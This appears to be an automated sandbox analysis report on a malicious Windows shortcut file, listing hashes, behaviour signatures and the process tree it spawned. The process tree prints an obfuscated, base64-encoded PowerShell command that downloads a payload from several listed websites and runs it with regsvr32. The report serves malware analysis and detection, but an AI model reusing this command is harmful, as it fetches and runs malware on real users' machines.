Analysis

  • max time kernel
    42s
  • max time network
    45s
  • platform
    windows7_x64
  • resource
    win7-20220414-en
  • submitted
    27-05-2022 08:37

General

  • Target

    44-76912499472.lnk

  • Size

    3KB

  • MD5

    afa789a5a4197b43071da4d94067d346

  • SHA1

    f5ef0b10c608fb042edae39919903b4c7510d49b

  • SHA256

    9e90586b5881001bffc59e5ab90808e1470b787e1095052602cece861c0648d6

  • SHA512

    2e5d94eb4d8d9fefe0dae56a7384673ae4f08ae1dc3f14bd63a01ca933689d555629b6b7acacb1b40a7ed0839ba99f9ce5f5e0791bdb09cb50b6dcb198a88808

Score
3/10

Malware Config

Signatures

  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

  • Suspicious behavior: EnumeratesProcesses 1 IoCs
  • Suspicious use of AdjustPrivilegeToken 1 IoCs
  • Suspicious use of WriteProcessMemory 6 IoCs

Processes

  • C:\Windows\system32\cmd.exe
    cmd /c C:\Users\Admin\AppData\Local\Temp\44-76912499472.lnk
    1⤵
    • Suspicious use of WriteProcessMemory
    PID:1520
    • C:\Windows\System32\cmd.exe
      "C:\Windows\System32\cmd.exe" /v:on /c XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX||p^owershell.^e^xe -c "&{$qbxoDL='IFdyaXRlLUhvc3QgIkNQWUlxIj';$ksGeW='skUHJvZ3Jlc3NQcmVmZXJlbmNlPSJTaWxlbnRseUNvbnRpbnVlIjskbGlua3M9KCJodHRwOi8vdGhlZ2VlcnMuY29tL21lZGlhLzE4VEtRVTM2Vi8iLCJodHRwOi8vdGFsYml6LmNvbS9fX01BQ09TWC83WFY5c3ZuV2VEcS8iLCJodHRwOi8vdGhlc3Rld2FyZHNjby5jb20vZ0pSV0ZCR3ZLVlZ4akUvIiwiaHR0cHM6Ly90aGVhcmxlcGhvdG9ncmFwaHkuY29tL3dwL25ybVkvIiwiaHR0cHM6Ly90ZWNuaS1zb2Z0LmNvbS9BQ0NFU09SSU9TL1hxcC8iLCJodHRwOi8vdGl0YW5pdW1zcGFyZXBhcnRzLmNvbS93cC1pbmNsdWRlcy9vcmdkVExoTkF5N1NkZUsvIik7JHQ9Ind3bUF0TyI7JGQ9IiRlbnY6VE1QXC4uXCR0Ijtta2RpciAtZm9yY2UgJGQgfCBvdXQtbnVsbDtmb3JlYWNoICgkdSBpbiAkbGlua3MpIHt0cnkge0lXUiAkdSAtT3V0RmlsZSAkZFxnZEdESVJxbFdnLnFjUTtSZWdzdnIzMi5leGUgIiRkXGdkR0RJUnFsV2cucWNRIjticmVha30gY2F0Y2ggeyB9fQ==';$k=$qbxoDL+$ksGeW;$sfKoh=[System.Text.Encoding]::ASCII.GetString([System.Convert]::FromBase64String($k));$jphbot=$sfKoh;iex($jphbot)}"
      2⤵
      • Suspicious use of WriteProcessMemory
      PID:780
      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        powershell.exe -c "&{$qbxoDL='IFdyaXRlLUhvc3QgIkNQWUlxIj';$ksGeW='skUHJvZ3Jlc3NQcmVmZXJlbmNlPSJTaWxlbnRseUNvbnRpbnVlIjskbGlua3M9KCJodHRwOi8vdGhlZ2VlcnMuY29tL21lZGlhLzE4VEtRVTM2Vi8iLCJodHRwOi8vdGFsYml6LmNvbS9fX01BQ09TWC83WFY5c3ZuV2VEcS8iLCJodHRwOi8vdGhlc3Rld2FyZHNjby5jb20vZ0pSV0ZCR3ZLVlZ4akUvIiwiaHR0cHM6Ly90aGVhcmxlcGhvdG9ncmFwaHkuY29tL3dwL25ybVkvIiwiaHR0cHM6Ly90ZWNuaS1zb2Z0LmNvbS9BQ0NFU09SSU9TL1hxcC8iLCJodHRwOi8vdGl0YW5pdW1zcGFyZXBhcnRzLmNvbS93cC1pbmNsdWRlcy9vcmdkVExoTkF5N1NkZUsvIik7JHQ9Ind3bUF0TyI7JGQ9IiRlbnY6VE1QXC4uXCR0Ijtta2RpciAtZm9yY2UgJGQgfCBvdXQtbnVsbDtmb3JlYWNoICgkdSBpbiAkbGlua3MpIHt0cnkge0lXUiAkdSAtT3V0RmlsZSAkZFxnZEdESVJxbFdnLnFjUTtSZWdzdnIzMi5leGUgIiRkXGdkR0RJUnFsV2cucWNRIjticmVha30gY2F0Y2ggeyB9fQ==';$k=$qbxoDL+$ksGeW;$sfKoh=[System.Text.Encoding]::ASCII.GetString([System.Convert]::FromBase64String($k));$jphbot=$sfKoh;iex($jphbot)}"
        3⤵
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        PID:1752

Network

MITRE ATT&CK Matrix ATT&CK v6

Discovery

System Information Discovery

1
T1082

Replay Monitor

Loading Replay Monitor...

Downloads

  • memory/780-88-0x0000000000000000-mapping.dmp
  • memory/1520-54-0x000007FEFBFD1000-0x000007FEFBFD3000-memory.dmp
    Filesize

    8KB

  • memory/1752-91-0x0000000000000000-mapping.dmp
  • memory/1752-94-0x000007FEF3960000-0x000007FEF44BD000-memory.dmp
    Filesize

    11.4MB

  • memory/1752-95-0x0000000002724000-0x0000000002727000-memory.dmp
    Filesize

    12KB

  • memory/1752-96-0x000000000272B000-0x000000000274A000-memory.dmp
    Filesize

    124KB